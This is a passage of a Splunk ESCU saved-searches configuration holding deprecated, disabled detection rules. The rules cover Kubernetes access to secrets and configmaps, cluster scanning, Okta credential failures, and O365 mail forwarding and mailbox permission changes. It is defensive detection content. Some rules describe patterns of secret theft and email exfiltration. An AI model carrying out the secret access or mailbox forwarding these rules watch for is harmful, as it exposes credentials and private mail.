action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* responseStatus.reason=Forbidden | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_detect_service_accounts_forbidden_failure_access_filter`

[ESCU - Kubernetes Azure detect suspicious kubectl calls - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on rare kubectl calls with IP, verb, namespace and object access context
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on rare kubectl calls with IP, verb, namespace and object access context
action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and configure Kube-Audit data diagnostics
action.escu.known_false_positives = Kubectl calls are not malicious by nature. However, source IP, verb and object can reveal potential malicious activity, especially suspicious IPs and sensitive objects such as configmaps or secrets
action.escu.creation_date = 2020-05-26
action.escu.modification_date = 2020-05-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Azure detect suspicious kubectl calls - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect suspicious kubectl calls - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_azure` category=kube-audit | spath input=properties.log | spath input=responseObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | search userAgent=kubectl* sourceIPs{}!=127.0.0.1 sourceIPs{}!=::1 | table sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI | rare sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI |`kubernetes_azure_detect_suspicious_kubectl_calls_filter`

[ESCU - Kubernetes Azure pod scan fingerprint - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on unauthenticated requests via source IP, user agent, request URI and response status data against a Kubernetes cluster pod in Azure
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on unauthenticated requests via source IP, user agent, request URI and response status data against a Kubernetes cluster pod in Azure
action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and configure Kube-Audit data diagnostics
action.escu.known_false_positives = Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context.
action.escu.creation_date = 2020-05-20
action.escu.modification_date = 2020-05-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Azure pod scan fingerprint - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Scanning Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure pod scan fingerprint - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod |`kubernetes_azure_pod_scan_fingerprint_filter`

[ESCU - Kubernetes Azure scan fingerprint - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on unauthenticated requests via source IP, user agent, request URI and response status data against a Kubernetes cluster in Azure
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on unauthenticated requests via source IP, user agent, request URI and response status data against a Kubernetes cluster in Azure
action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and configure Kube-Audit data diagnostics
action.escu.known_false_positives = Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context.
action.escu.creation_date = 2020-05-19
action.escu.modification_date = 2020-05-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Azure scan fingerprint - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Scanning Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure scan fingerprint - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason |`kubernetes_azure_scan_fingerprint_filter`

[ESCU - Kubernetes GCP detect most active service accounts by pod - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts accessing pods, by IP address, verb and decision
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes service accounts accessing pods, by IP address, verb and decision
action.escu.how_to_implement = You must install the Splunk GCP add-on. This search works with Pub/Sub messaging service logs
action.escu.known_false_positives = Not all service account interactions are malicious. Analysts must consider IP, verb and decision context when trying to detect maliciousness.
action.escu.creation_date = 2020-07-10
action.escu.modification_date = 2020-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes GCP detect most active service accounts by pod - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect most active service accounts by pod - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` data.protoPayload.request.spec.group{}=system:serviceaccounts | table src_ip src_user http_user_agent data.protoPayload.request.spec.nonResourceAttributes.verb data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource | top src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource |`kubernetes_gcp_detect_most_active_service_accounts_by_pod_filter`

[ESCU - Kubernetes GCP detect RBAC authorizations by account - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes RBAC authorizations by account; this search can be modified by adding top to see both extremes of RBAC-by-account occurrences
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes RBAC authorizations by account; this search can be modified by adding top to see both extremes of RBAC-by-account occurrences
action.escu.how_to_implement = You must install splunk AWS add on for GCP. This search works with Pub/Sub messaging service logs
action.escu.known_false_positives = Not all RBAC authorizations are malicious. RBAC authorizations can uncover malicious activity, especially if sensitive roles have been granted.
action.escu.creation_date = 2020-07-11
action.escu.modification_date = 2020-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes GCP detect RBAC authorizations by account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect RBAC authorizations by account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole | table src_ip src_user data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | rare src_user data.labels.authorization.k8s.io/reason |`kubernetes_gcp_detect_rbac_authorizations_by_account_filter`

[ESCU - Kubernetes GCP detect sensitive object access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.how_to_implement = You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging service logs.
action.escu.known_false_positives = Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.
action.escu.creation_date = 2020-07-11
action.escu.modification_date = 2020-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes GCP detect sensitive object access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect sensitive object access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.resource=configmaps OR secrets | table data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name data.protoPayload.request.metadata.namespace data.labels.authorization.k8s.io/decision | dedup data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name |`kubernetes_gcp_detect_sensitive_object_access_filter`

[ESCU - Kubernetes GCP detect sensitive role access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.how_to_implement = You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging service logs.
action.escu.known_false_positives = Sensitive role resource access is necessary for cluster operation; however, source IP, user agent, decision and reason may indicate possible malicious use.
action.escu.creation_date = 2020-07-11
action.escu.modification_date = 2020-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes GCP detect sensitive role access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect sensitive role access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole dest=apis/rbac.authorization.k8s.io/v1 src_ip!=::1 | table src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | dedup src_ip src_user |`kubernetes_gcp_detect_sensitive_role_access_filter`

[ESCU - Kubernetes GCP detect service accounts forbidden failure access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts with failure or forbidden access status; this search can be extended by using the top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes service accounts with failure or forbidden access status; this search can be extended by using the top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI
action.escu.how_to_implement = You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging service logs.
action.escu.known_false_positives = This search can give false positives as there might be inherent issues with authentication and permissions in the cluster.
action.escu.creation_date = 2020-06-23
action.escu.modification_date = 2020-06-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes GCP detect service accounts forbidden failure access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect service accounts forbidden failure access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` system:serviceaccounts data.protoPayload.response.status.allowed!=* | table src_ip src_user http_user_agent data.protoPayload.response.spec.resourceAttributes.namespace data.resource.labels.cluster_name data.protoPayload.response.spec.resourceAttributes.verb data.protoPayload.request.status.allowed data.protoPayload.response.status.reason data.labels.authorization.k8s.io/decision | dedup src_ip src_user | `kubernetes_gcp_detect_service_accounts_forbidden_failure_access_filter`

[ESCU - Kubernetes GCP detect suspicious kubectl calls - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on anonymous kubectl calls with IP, verb, namespace and object access context
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on anonymous kubectl calls with IP, verb, namespace and object access context
action.escu.how_to_implement = You must install the Splunk add-on for GCP. This search works with Pub/Sub messaging logs.
action.escu.known_false_positives = Kubectl calls are not malicious by nature. However, source IP, source user, user agent, object path, and authorization context can reveal potential malicious activity, especially anonymous suspicious IPs and sensitive objects such as configmaps or secrets
action.escu.creation_date = 2020-07-11
action.escu.modification_date = 2020-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes GCP detect suspicious kubectl calls - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes GCP detect suspicious kubectl calls - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerSuppliedUserAgent=kubectl* src_user=system:unsecured OR src_user=system:anonymous | table src_ip src_user data.protoPayload.requestMetadata.callerSuppliedUserAgent data.protoPayload.authorizationInfo{}.granted object_path |dedup src_ip src_user |`kubernetes_gcp_detect_suspicious_kubectl_calls_filter`

[ESCU - Monitor DNS For Brand Abuse - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Resolution"]
action.escu.eli5 = This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse.
action.escu.how_to_implement = You need to ingest data from your DNS logs. Specifically, you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach allows you to also create your own localized passive DNS capability which can aid you in future investigations. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for. You also need the [`dnstwist`](https://gist.github.com/d1vious/c4c2aae7fa7d5cbb1f24adc5f6303ac1) custom command.
action.escu.known_false_positives = None at this time
action.escu.creation_date = 2017-09-23
action.escu.modification_date = 2017-09-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Monitor DNS For Brand Abuse - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Brand Monitoring"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Monitor DNS For Brand Abuse - Rule
action.correlationsearch.annotations = {"analytic_story": ["Brand Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for DNS requests for faux domains similar to the domains that you want to have monitored for abuse.
action.notable.param.rule_title = Monitor DNS For Brand Abuse
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name("DNS")` | `security_content_ctime(firstTime)`| `brand_abuse_dns` | `monitor_dns_for_brand_abuse_filter`

[ESCU - Multiple Okta Users With Invalid Credentials From The Same IP - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Users Failing To Authenticate From Ip`. This analytic identifies multiple failed logon attempts from a single IP in a short period of time. Use this analytic to identify patterns of suspicious logins from a single source and filter as needed, or use this to drive tuning for higher fidelity analytics.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1110.003", "T1078", "T1078.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Users Failing To Authenticate From Ip`. This analytic identifies multiple failed logon attempts from a single IP in a short period of time. Use this analytic to identify patterns of suspicious logins from a single source and filter as needed, or use this to drive tuning for higher fidelity analytics.
action.escu.how_to_implement = This search is specific to Okta and requires that Okta logs are being ingested in your Splunk deployment.
action.escu.known_false_positives = A single public IP address servicing multiple legitimate users may trigger this search. In addition, the threshold of 5 distinct users may be too low for your needs. You may modify the included filter macro `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter` to raise the threshold or except specific IP addresses from triggering this search.
action.escu.creation_date = 2024-02-29
action.escu.modification_date = 2024-02-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Multiple Okta Users With Invalid Credentials From The Same IP - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Suspicious Okta Activity"]
action.risk = 1
action.risk.param._risk_message = Multiple user accounts have failed to authenticate from a single IP.
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Multiple Okta Users With Invalid Credentials From The Same IP - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1110.003", "T1078", "T1078.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Users Failing To Authenticate From Ip`. This analytic identifies multiple failed logon attempts from a single IP in a short period of time. Use this analytic to identify patterns of suspicious logins from a single source and filter as needed, or use this to drive tuning for higher fidelity analytics.
action.notable.param.rule_title = Multiple Okta Users With Invalid Credentials From The Same IP
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `okta` eventType=user.session.start outcome.result=FAILURE | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats min(_time) as firstTime max(_time) as lastTime dc(src_user) as distinct_users values(src_user) as users by src_ip, displayMessage, outcome.reason, country, state, city | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search distinct_users > 5| `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter`

[ESCU - O365 Suspicious Admin Email Forwarding - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. This search detects when an admin configured a forwarding rule for multiple mailboxes to the same destination.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. This search detects when an admin configured a forwarding rule for multiple mailboxes to the same destination.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 add-on.
This search works with o365:management:activity action.escu.known_false_positives = unknown action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Suspicious Admin Email Forwarding - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = User $user$ has configured a forwarding rule for multiple mailboxes to the same destination $ForwardingAddress$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - O365 Suspicious Admin Email Forwarding - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` 
|`o365_suspicious_admin_email_forwarding_filter` [ESCU - O365 Suspicious Rights Delegation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Elevated Mailbox Permission Assigned`. This analytic identifies instances where potentially suspicious rights are delegated within the Office 365 environment. Specifically, it detects when a user is granted FullAccess, SendAs, or SendOnBehalf permissions on another users mailbox. Such permissions can allow a user to access, send emails from, or send emails on behalf of the target mailbox. The detection leverages O365 audit logs, focusing on the Add-MailboxPermission operation. By parsing the parameters of this operation, the analytic filters for events where FullAccess, SendAs, or SendOnBehalf rights are granted. It then aggregates this data to capture the source user (who was granted the permissions), the destination user (whose mailbox was affected), the specific operation, and the type of access rights granted. Delegating mailbox rights, especially those as powerful as FullAccess, can pose significant security risks. While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executives mailbox, there are also malicious scenarios where an attacker or a compromised insider might grant themselves unauthorized access to sensitive mailboxes. Monitoring for these permissions changes is crucial to detect potential insider threats, compromised accounts, or other malicious activities.If the detection is a true positive, it indicates that a user has been granted potentially high-risk permissions on another users mailbox. 
